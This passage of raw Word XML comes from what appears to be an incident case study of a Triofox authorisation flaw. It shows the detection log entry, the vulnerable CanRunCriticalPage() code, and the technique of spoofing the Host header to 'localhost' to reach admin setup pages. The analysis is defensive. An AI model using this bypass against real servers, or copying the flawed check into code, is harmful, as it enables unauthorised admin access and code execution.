                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Host: localhost</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>; leads to admin creation and RCE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4  Problem Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The central question is narrow and technical: how did a single missing authorisation check in an internet-facing application escalate into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>-level code execution and the beginnings of domain compromise, and which controls along that path would have stopped or surfaced the attack?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Answering it requires separating the authorisation failure from everything it enabled. The initial flaw did not, by itself, execute code. It granted access to functionality, specifically the ability to re-run setup, that the design assumed only a trusted first-time operator would reach. The attacker then used legitimate, documented product features to turn that access into execution. That shape, a small trust failure amplified by the normal capabilities of a powerful application, is what makes the incident worth studying. The report investigates four linked questions: what failed in the access control decision and why; how the application's trust assumptions and initialisation workflow let that failure matter; how the built-in anti-virus feature was abused to reach code execution; and how the incident was detected and contained, which points directly at the controls that were missing and the ones that worked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5  Case Description: Techniques Used in the Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.1  Detection and the anomalous request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Mandiant's investigation did not begin with the vulnerability; it began with an alert. Google Security Operations raised a composite detection that correlated two behaviours on a customer's Triofox server: the use of remote access utilities tunnelling RDP externally, and file writes into a staging directory under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>C:\WINDOWS\Temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Within 16 minutes of starting the investigation, Mandiant confirmed the compromise and contained the host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. The speed is a theme the analysis returns to: the detection content, not any preventive control on Triofox itself, is what limited the damage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Working backward, investigators found an irregular entry in the IIS HTTP log. A request from an external address carried a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> header pointing at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://localhost/…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, which should not occur in legitimate traffic from a remote client:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:jc w:val="left"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>GET /management/CommitPage.aspx - 443 - 85.239.63[.]37</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+...+Safari/537.36</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>http://localhost/management/AdminAccount.aspx 302 0 0 56041</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">That single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> artefact is the thread that unravels the whole chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.2  The access control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In a test environment, Mandiant confirmed that a normal request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminAccount.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> or to the setup page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminDatabase.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is redirected to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AccessDenied.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, so an access control was nominally present. The control was defeated by changing one request field. Setting the HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> header to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> granted access to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminDatabase.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason is visible in the vulnerable code. Access to the critical setup page is decided by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CanRunCriticalPage()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GladPageUILib.GladBasePage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> class. The function reads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Request.Url.Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and, if it equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> immediately, skipping every other check:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:jc w:val="left"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>public bool CanRunCriticalPage()</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    Uri url = base.Request.Url;</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    string host = url.Host;</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    bool flag = string.Compare(host, "localhost", true) == 0;</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (flag) { return true; }   // all further checks skipped</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    // otherwise: compare client IP against AppSettings["TrustedHostIp"]</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Three design faults compound here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. ASP.NET populated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Request.Url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the client-supplied </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> header, so the value the check trusted was attacker-controlled. There was no validation that the request genuinely originated from a loopback connection rather than carrying a spoofed header. And if the optional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TrustedHostIp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting was left unconfigured, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> comparison was the only barrier left. The intended meaning of the check, “this request came from the machine itself,” was never actually verified; a string that any client can send stood in for proof of origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1 renders the decision as a flow, which makes the short-circuit explicit: the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch returns before any trustworthy evidence is consulted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5400000" cy="2479900"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
